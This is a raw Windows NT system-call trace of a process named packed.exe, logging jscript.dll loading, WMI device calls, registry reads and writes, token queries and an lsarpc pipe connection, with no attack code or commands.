 01940   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\jscript.dll"}, 1237860, ... ) }, 1237860, ... ) == 0x0
 01941   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\jscript.dll"}, 5, 96, ... 216, {status=0x0, info=1}, ) }, 5, 96, ... 216, {status=0x0, info=1}, ) == 0x0
 01942   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 216, ... 212, ) == 0x0
 01943   456   NtQuerySection  (212, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01944   456   NtClose  (216, ... ) == 0x0
 01945   456   NtMapViewOfSection  (212, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x75c50000), 0x0, 593920, ) == 0x0
 01946   456   NtClose  (212, ... ) == 0x0
 01947   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01948   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 10289152, 1048576, ) == 0x0
 01949   456   NtAllocateVirtualMemory  (-1, 10289152, 0, 4096, 4096, 4, ... 10289152, 4096, ) == 0x0
 01950   456   NtAllocateVirtualMemory  (-1, 10293248, 0, 8192, 4096, 4, ... 10293248, 8192, ) == 0x0
 01951   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 212, ) == 0x0
 01952   456   NtAllocateVirtualMemory  (-1, 10301440, 0, 4096, 4096, 4, ... 10301440, 4096, ) == 0x0
 01953   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1239652,  (0xc0100080, {24, 0, 0x40, 0, 1239652, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 216, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 216, {status=0x0, info=0}, ) == 0x0
 01954   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 220, ) == 0x0
 01955   456   NtDeviceIoControlFile  (216, 220, 0x0, 0x12eac4, 0x22414c,  (216, 220, 0x0, 0x12eac4, 0x22414c, "h\353\22\0\0\0\0\0\1\0\0\0\5\0\0\0\24\0\0\0\34\0\0\0\250\0\0\0\0\0\0\0\240\0\0\0\0\0\0\0\5\0\0\0\331Wn\31\300I;K\254:\250\251:\332\318\0\20\10\0\0\0\0\0\0\0\0\0]\32s\220%\342\361A\243\205\273\21\341\333z\205\0\0\10\0\0\0\0\0\0\0\0\0\10\254>\233\270\363\211M\261\215G\10\22\347\253R\0\0\10\0\0\0\0\0\0\0\0\0.iu\212g\223\16C\271;\236T\36\210X\35\0\0\10\0\0\0\0\0\0\0\0\0\322a\275Af\237K\235R\322\321;\7s\34\0\0\10\0\0\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0", 192, 176, ... , 192, 176, ...
 01956   456   NtOpenKey  (0x82000000, {24, 0, 0x240, 0, 0,  (0x82000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\WMI\Security"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 01957   456   NtQueryValueKey  (-2147482028,  (-2147482028, "DF8480A1-7492-4F45-AB78-1084642581FB", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01958   456   NtQueryValueKey  (-2147482028,  (-2147482028, "00000000-0000-0000-0000-000000000000", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01959   456   NtClose  (-2147482028, ... ) == 0x0
 01960   456   NtClose  (1620, ... ) == 0x0
 01955   456   NtDeviceIoControlFile  ... {status=0x0, info=176},  ... {status=0x0, info=176}, "\340\244\3\341\0\0\0\0\331Wn\31\300I;K\254:\250\251:\332\318\241I\215\264w\347\320\21\0\245\3\341\0\0\0\0\331Wn\31\300I;K\254:\250\251:\332\318`\0\0\0\30\0\0\0 \245\3\341\0\0\0\0\331Wn\31\300I;K\254:\250\251:\332\318F\0O\0\0\0\0\0@\245\3\341\0\0\0\0\331Wn\31\300I;K\254:\250\251:\332\318 \2\0\0#\2\0\0.iu\212g\223\16C\271;\236T\36\210X\35\0\0\10\0\0\0\0\0\0\0\0\0\322a\275\340\0\0\0\235R\322\321\0\0\0\0\0\0\0\0", ) , ) == 0x0
 01961   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1239844,  (0xc0100080, {24, 0, 0x40, 0, 1239844, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 228, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 228, {status=0x0, info=0}, ) == 0x0
 01962   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 232, ) == 0x0
 01963   456   NtDuplicateObject  (-1, -1, -1, 0x0, 0, 2, ... 236, ) == 0x0
 01964   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 240, ) == 0x0
 01965   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 244, ) == 0x0
 01966   456   NtAllocateVirtualMemory  (-1, 10305536, 0, 8192, 4096, 4, ... 10305536, 8192, ) == 0x0
 01967   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 11337728, 1048576, ) == 0x0
 01968   456   NtAllocateVirtualMemory  (-1, 12378112, 0, 8192, 4096, 4, ... 12378112, 8192, ) == 0x0
 01969   456   NtProtectVirtualMemory  (-1, (0xbce000), 4096, 260, ... (0xbce000), 4096, 4, ) == 0x0
 01970   456   NtCreateThread  (0x1f03ff, 0x0, -1, 1239096, 1239812, 1, ... 248, {452, 736}, ) == 0x0
 01971   456   NtQueryInformationThread  (248, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffdd000,Pid=452,Tid=736,}, 0x0, ) == 0x0
 01972   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 2012555294, 2012555303, 1239684, 131108}  (24, {28, 56, new_msg, 0, 2012555294, 2012555303, 1239684, 131108} "\0\0\0\0\1\0\1\0\354\347\22\0\37\342\367w\370\0\0\0\304\1\0\0\340\2\0\0" ... {28, 56, reply, 0, 452, 456, 1559, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\37\342\367w\370\0\0\0\304\1\0\0\340\2\0\0" )  ... {28, 56, reply, 0, 452, 456, 1559, 0}  (24, {28, 56, new_msg, 0, 2012555294, 2012555303, 1239684, 131108} "\0\0\0\0\1\0\1\0\354\347\22\0\37\342\367w\370\0\0\0\304\1\0\0\340\2\0\0" ... {28, 56, reply, 0, 452, 456, 1559, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\37\342\367w\370\0\0\0\304\1\0\0\340\2\0\0" )  ) == 0x0
 01973   456   NtResumeThread  (248, ... 1, ) == 0x0
 01974   456   NtClose  (248, ... ) == 0x0
 01975   456   NtSetEvent  (232, ... 0x0, ) == 0x0
 01976   736   NtAllocateVirtualMemory  (-1, 8925184, 0, 4096, 4096, 4, ... 8925184, 4096, ) == 0x0
 01977   736   NtTestAlert  (... ) == 0x0
 01978   736   NtContinue  (12385584, 1, ...
 01979   736   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 01980   736   NtDeviceIoControlFile  (228, 240, 0x0, 0x77e36620, 0x228144,  (228, 240, 0x0, 0x77e36620, 0x228144, "\1\0\0\0\1\0\0\0\362k\342w\0\0\0\0\354\0\0\0\0\0\0\0\340\0\0\0\0\0\0\0", 32, 4096, ... {status=0x103, info=0}, "", ) , 32, 4096, ... {status=0x103, info=0}, "", ) == 0x103
 01981   736   NtWaitForMultipleObjects  (2, (232, 240, ), 1, 1, {1294967296, -1}, ...
 01982   456   NtSetEvent  (212, ... 0x0, ) == 0x0
 01983   456   NtClose  (212, ... ) == 0x0
 01984   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01985   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 01986   456   NtQueryVirtualMemory  (-1, 0x12f9dc, Basic, 28, ... {BaseAddress=0x12f000,AllocationBase=0x30000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 01987   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 212, ) }, ... 212, ) == 0x0
 01981   736   NtWaitForMultipleObjects  ... ) == 0x0
 01988   736   NtDeviceIoControlFile  (228, 244, 0x0, 0x77e36600, 0x228144,  (228, 244, 0x0, 0x77e36600, 0x228144, "\1\0\0\0\1\0\0\0\362k\342w\0\0\0\0\354\0\0\0\0\0\0\0\340\0\0\0\0\0\0\0", 32, 4096, ... {status=0x103, info=0}, "", ) , 32, 4096, ... {status=0x103, info=0}, "", ) == 0x103
 01989   736   NtWaitForMultipleObjects  (2, (232, 244, ), 1, 1, {1294967296, -1}, ...
 01990   456   NtQueryValueKey  (212,  (212, "COM+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (212, "COM+Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01991   456   NtClose  (212, ... ) == 0x0
 01992   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01993   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Rpc\PagedBuffers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01994   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Rpc"}, ... 212, ) }, ... 212, ) == 0x0
 01995   456   NtQueryValueKey  (212,  (212, "MaxRpcSize", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01996   456   NtClose  (212, ... ) == 0x0
 01997   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\packed.exe\RpcThreadPoolThrottle"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01998   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 212, ) == 0x0
 01999   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 248, ) == 0x0
 02000   456   NtQuerySystemTime  (... {235453468, 29873142}, ) == 0x0
 02001   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 252, ) == 0x0
 02002   456   NtAllocateVirtualMemory  (-1, 1392640, 0, 4096, 4096, 4, ... 1392640, 4096, ) == 0x0
 02003   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\Rpc"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02004   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 0x0, ) == 0x0
 02005   456   NtQueryInformationProcess  (-1, QuotaLimits, 32, ... {process info, class 1, size 32}, 0x0, ) == 0x0
 02006   456   NtQueryInformationProcess  (-1, VmCounters, 44, ... {process info, class 3, size 44}, 0x0, ) == 0x0
 02007   456   NtAllocateVirtualMemory  (-1, 8810496, 0, 4096, 4096, 4, ... 8810496, 4096, ) == 0x0
 02008   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows Script\Settings"}, 0, 0x0, 0, ... ) }, 0, 0x0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02009   456   NtCreateKey  (0x2000000, {24, 52, 0x40, 0, 0,  (0x2000000, {24, 52, 0x40, 0, 0, "Software"}, 0, 0x0, 0, ... 256, 2, ) }, 0, 0x0, 0, ... 256, 2, ) == 0x0
 02010   456   NtCreateKey  (0x2000000, {24, 256, 0x40, 0, 0,  (0x2000000, {24, 256, 0x40, 0, 0, "Microsoft"}, 0, 0x0, 0, ... 260, 2, ) }, 0, 0x0, 0, ... 260, 2, ) == 0x0
 02011   456   NtClose  (256, ... ) == 0x0
 02012   456   NtCreateKey  (0x2000000, {24, 260, 0x40, 0, 0,  (0x2000000, {24, 260, 0x40, 0, 0, "Windows Script"}, 0, 0x0, 0, ... }, 0, 0x0, 0, ...
 02013   456   NtSetInformationFile  (-2147482700, -130579420, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02014   456   NtSetInformationFile  (-2147482700, -130579456, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02015   456   NtSetInformationFile  (-2147482700, -130579892, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02016   456   NtSetInformationFile  (-2147482700, -130579708, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02017   456   NtSetInformationFile  (-2147482700, -130579516, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02012   456   NtCreateKey  ... 256, 1, ) == 0x0
 02018   456   NtClose  (260, ... ) == 0x0
 02019   456   NtCreateKey  (0x2000000, {24, 256, 0x40, 0, 0,  (0x2000000, {24, 256, 0x40, 0, 0, "Settings"}, 0, 0x0, 0, ... }, 0, 0x0, 0, ...
 02020   456   NtSetInformationFile  (-2147482700, -130579788, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02019   456   NtCreateKey  ... 260, 1, ) == 0x0
 02021   456   NtClose  (256, ... ) == 0x0
 02022   456   NtQueryValueKey  (260,  (260, "JITDebug", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02023   456   NtSetValueKey  (260,  (260, "JITDebug", 0, 4, "\0\0\0\0", 4, ... ) , 0, 4,  (260, "JITDebug", 0, 4, "\0\0\0\0", 4, ... ) , 4, ... ) == 0x0
 02024   456   NtClose  (260, ... ) == 0x0
 02025   456   NtOpenEvent  (0x1f0003, {24, 64, 0x0, 0, 0,  (0x1f0003, {24, 64, 0x0, 0, 0, "MSFT.VSA.COM.DISABLE.452"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02026   456   NtOpenEvent  (0x100002, {24, 64, 0x0, 0, 0,  (0x100002, {24, 64, 0x0, 0, 0, "MSFT.VSA.IEC.STATUS.6c736db0"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02027   456   NtQueryVirtualMemory  (-1, 0x987466, Basic, 28, ... {BaseAddress=0x987000,AllocationBase=0x960000,AllocationProtect=0x80,RegionSize=0x3000,State=0x1000,Protect=0x2,Type=0x1000000,}, 0x0, ) == 0x0
 02028   456   NtProtectVirtualMemory  (-1, (0x987466), 1, 4, ... (0x987000), 4096, 2, ) == 0x0
 02029   456   NtContinue  (1243048, 0, ...
 02030   456   NtAllocateVirtualMemory  (-1, 8814592, 0, 4096, 4096, 4, ... 8814592, 4096, ) == 0x0
 02031   456   NtAllocateVirtualMemory  (-1, 8818688, 0, 8192, 4096, 4, ... 8818688, 8192, ) == 0x0
 02032   456   NtAllocateVirtualMemory  (-1, 8826880, 0, 8192, 4096, 4, ... 8826880, 8192, ) == 0x0
 02033   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02034   456   NtUserGetProcessWindowStation  (... ) == 0x24
 02035   456   NtRequestWaitReplyPort  (24, {24, 52, new_msg, 0, 2012697872, -1, 2012551179, 2012558492}  (24, {24, 52, new_msg, 0, 2012697872, -1, 2012551179, 2012558492} "\0\0\0\0\5\4\3\0m4\365w\334F+w\310\1\0\0\0\0\0\0" ... {24, 52, reply, 0, 452, 456, 1560, 0} "\0\0\0\0\5\4\3\0\0\0\0\0\334F+w\310\1\0\0\0\0\0\0" )  ... {24, 52, reply, 0, 452, 456, 1560, 0}  (24, {24, 52, new_msg, 0, 2012697872, -1, 2012551179, 2012558492} "\0\0\0\0\5\4\3\0m4\365w\334F+w\310\1\0\0\0\0\0\0" ... {24, 52, reply, 0, 452, 456, 1560, 0} "\0\0\0\0\5\4\3\0\0\0\0\0\334F+w\310\1\0\0\0\0\0\0" )  ) == 0x0
 02036   456   NtUserGetThreadDesktop  (456, 0, ... ) == 0x28
 02037   456   NtUserGetObjectInformation  (36, 2, 1242800, 64, 1242880, ... ) == 0x1
 02038   456   NtUserGetObjectInformation  (40, 2, 1242736, 64, 1242880, ... ) == 0x1
 02039   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 260, ) == 0x0
 02040   456   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 256, ) == 0x0
 02041   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\winlogon.exe"}, 1240504, ... ) }, 1240504, ... ) == 0x0
 02042   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\winlogon.exe"}, 5, 96, ... 264, {status=0x0, info=1}, ) }, 5, 96, ... 264, {status=0x0, info=1}, ) == 0x0
 02043   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 264, ... 268, ) == 0x0
 02044   456   NtClose  (264, ... ) == 0x0
 02045   456   NtMapViewOfSection  (268, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xbd0000), 0x0, 430080, ) == 0x0
 02046   456   NtClose  (268, ... ) == 0x0
 02047   456   NtUnmapViewOfSection  (-1, 0xbd0000, ... ) == 0x0
 02048   456   NtAllocateVirtualMemory  (-1, 1396736, 0, 4096, 4096, 4, ... 1396736, 4096, ) == 0x0
 02049   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 268, ) == 0x0
 02050   456   NtConnectPort  ( ("\RPC Control\epmapper", {12, 2, 1, 0}, 0x0, 0x0, 1241284, 112, ... 264, 0x0, 0x0, 0x0, 112, ) , {12, 2, 1, 0}, 0x0, 0x0, 1241284, 112, ... 264, 0x0, 0x0, 0x0, 112, ) == 0x0
 02051   456   NtRequestWaitReplyPort  (264, {128, 152, new_msg, 0, 1310720, 126616, 1310720, 1241048}  (264, {128, 152, new_msg, 0, 1310720, 126616, 1310720, 1241048} "\0$\370w\210\366\22\0\2$\370w\346s\14\346\371\210\317\21\232\361\0 \257nr\364\2\0\0\0\1\0\0\0\30;\25\0\4\0\0\0\30;\25\0\20\344\314w\30;\25\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\0\0x\1\24\0q\26\365w\310P\25\00O\25\0\240P\25\0\0\0\0\0\0\0\0\0\0\0\0\0\310P\25\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {128, 152, reply, 0, 452, 456, 1562, 0} "\7$\370w\210\366\22\0\2$\370w\346s\14\346\371\210\317\21\232\361\0 \257nr\364\2\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\30;\25\0\377\377\377\377\30;\25\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\0\0x\1\24\0q\26\365w\310P\25\00O\25\0\240P\25\0\0\0\0\0\0\0\0\0\0\0\0\0\310P\25\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {128, 152, reply, 0, 452, 456, 1562, 0}  (264, {128, 152, new_msg, 0, 1310720, 126616, 1310720, 1241048} "\0$\370w\210\366\22\0\2$\370w\346s\14\346\371\210\317\21\232\361\0 \257nr\364\2\0\0\0\1\0\0\0\30;\25\0\4\0\0\0\30;\25\0\20\344\314w\30;\25\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\0\0x\1\24\0q\26\365w\310P\25\00O\25\0\240P\25\0\0\0\0\0\0\0\0\0\0\0\0\0\310P\25\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {128, 152, reply, 0, 452, 456, 1562, 0} "\7$\370w\210\366\22\0\2$\370w\346s\14\346\371\210\317\21\232\361\0 \257nr\364\2\0\0\0\1\0\0\0\0\0\0\0\4\0\0\0\30;\25\0\377\377\377\377\30;\25\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\0\0x\1\24\0q\26\365w\310P\25\00O\25\0\240P\25\0\0\0\0\0\0\0\0\0\0\0\0\0\310P\25\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 02052   456   NtRequestWaitReplyPort  (264, {104, 128, new_msg, 0, 0, 0, 0, 0}  (264, {104, 128, new_msg, 0, 0, 0, 0, 0} "\1\0\0\0A\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\350L\25\0\20\0\0\0\0\0\0\0\20\0\0\0W\0i\0n\0S\0t\0a\00\0\\0D\0e\0f\0a\0u\0l\0t\0\0\0\304\1\0\0\0\0\0\0\12\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {40, 64, reply, 0, 452, 456, 1563, 0} "\2\32X\200\4\0<\201X[\214\0\0\0\0\0\2\2\0\0\5\0\0\0\300[\214\371\2\0\0\0\224\3\0\0\20\2\11\0" )  ... {40, 64, reply, 0, 452, 456, 1563, 0}  (264, {104, 128, new_msg, 0, 0, 0, 0, 0} "\1\0\0\0A\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\350L\25\0\20\0\0\0\0\0\0\0\20\0\0\0W\0i\0n\0S\0t\0a\00\0\\0D\0e\0f\0a\0u\0l\0t\0\0\0\304\1\0\0\0\0\0\0\12\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {40, 64, reply, 0, 452, 456, 1563, 0} "\2\32X\200\4\0<\201X[\214\0\0\0\0\0\2\2\0\0\5\0\0\0\300[\214\371\2\0\0\0\224\3\0\0\20\2\11\0" )  ) == 0x0
 02053   456   NtRequestWaitReplyPort  (264, {64, 88, new_msg, 56, 0, 1397024, 1310720, 0}  (264, {64, 88, new_msg, 56, 0, 1397024, 1310720, 0} "\10\362\22\0@\0\22\0\2$\370w\20U\367w\377\377\377\377\13\30\365w\24(\314w\0\0\24\0\1\0\0\00R\25\0\224\3\0\0\224\3\0\0\20\2\11\0\0\0\0\0\0\0\0\0 \363\22\0" ... {64, 88, reply, 56, 452, 456, 1564, 0} "\10\362\22\0@\0\22\0\2$\370w\20U\367w\377\377\377\377\13\30\365w\24(\314w\0\0\24\0\1\0\0\00R\25\0\224\3\0\0\224\3\0\0\20\2\11\0\0\0\0\0\0\0\0\0 \363\22\0" )  ... {64, 88, reply, 56, 452, 456, 1564, 0}  (264, {64, 88, new_msg, 56, 0, 1397024, 1310720, 0} "\10\362\22\0@\0\22\0\2$\370w\20U\367w\377\377\377\377\13\30\365w\24(\314w\0\0\24\0\1\0\0\00R\25\0\224\3\0\0\224\3\0\0\20\2\11\0\0\0\0\0\0\0\0\0 \363\22\0" ... {64, 88, reply, 56, 452, 456, 1564, 0} "\10\362\22\0@\0\22\0\2$\370w\20U\367w\377\377\377\377\13\30\365w\24(\314w\0\0\24\0\1\0\0\00R\25\0\224\3\0\0\224\3\0\0\20\2\11\0\0\0\0\0\0\0\0\0 \363\22\0" )  ) == 0x0
 02054   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 02055   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "AppID\packed.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02056   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\AppID\packed.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02057   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\OLE"}, ... 272, ) }, ... 272, ) == 0x0
 02058   456   NtQueryValueKey  (272,  (272, "DefaultAccessPermission", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02059   456   NtOpenProcessToken  (-1, 0x8, ... 276, ) == 0x0
 02060   456   NtQueryInformationToken  (276, User, 52, ... {token info, class 1, size 36}, 36, ) == 0x0
 02061   456   NtClose  (276, ... ) == 0x0
 02062   456   NtClose  (272, ... ) == 0x0
 02063   456   NtOpenThreadToken  (-2, 0x4, 1, ... ) == STATUS_NO_TOKEN
 02064   456   NtOpenProcessToken  (-1, 0x8, ... 272, ) == 0x0
 02065   456   NtQueryInformationToken  (272, User, 52, ... {token info, class 1, size 36}, 36, ) == 0x0
 02066   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\ComputerName"}, ... 276, ) }, ... 276, ) == 0x0
 02067   456   NtOpenKey  (0x20019, {24, 276, 0x40, 0, 0,  (0x20019, {24, 276, 0x40, 0, 0, "ActiveComputerName"}, ... 280, ) }, ... 280, ) == 0x0
 02068   456   NtQueryValueKey  (280,  (280, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Full, 108, ... TitleIdx=0, Type=1, Name= (280, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Data= (280, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) }, 60, ) == 0x0
 02069   456   NtClose  (280, ... ) == 0x0
 02070   456   NtClose  (276, ... ) == 0x0
 02071   456   NtCreateIoCompletion  (0x1f0003, 0x0, 0, ... 276, ) == 0x0
 02072   456   NtCreateIoCompletion  (0x1f0003, 0x0, -1, ... 280, ) == 0x0
 02073   456   NtDuplicateObject  (-1, 276, -1, 0x0, 0, 2, ... 284, ) == 0x0
 02074   456   NtAllocateVirtualMemory  (-1, 1400832, 0, 4096, 4096, 4, ... 1400832, 4096, ) == 0x0
 02075   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 02076   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 288, ) == 0x0
 02077   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 02078   456   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 02079   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1240808,  (0xc0100080, {24, 0, 0x40, 0, 1240808, "\??\PIPE\lsarpc"}, 0x0, 0, 3, 1, 64, 0, 0, ... 292, {status=0x0, info=1}, ) }, 0x0, 0, 3, 1, 64, 0, 0, ... 292, {status=0x0, info=1}, ) == 0x0
 02080   456   NtSetInformationFile  (292, 1240864, 8, Pipe, ... {status=0x0, info=0}, ) == 0x0
 02081   456   NtSetInformationFile  (292, 1240856, 8, Completion, ... {status=0x0, info=0}, ) == 0x0
 02082   456   NtSetInformationThread  (-2, ImpersonationToken, {ImpToken=0,}, 4, ... ) == 0x0
 02083   456   NtWriteFile  (292, 261, 0, 0,  (292, 261, 0, 0, "\5\0\13\3\20\0\0\0H\0\0\0\1\0\0\0\270\20\270\20\0\0\0\0\1\0\0\0\0\0\1\0xW4\224\22\315\253\357\0\1#Eg\211\253\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", 72, {0, 0}, 0, ... {status=0x0, info=72}, ) , 72, {0, 0}, 0, ... {status=0x0, info=72}, ) == 0x0
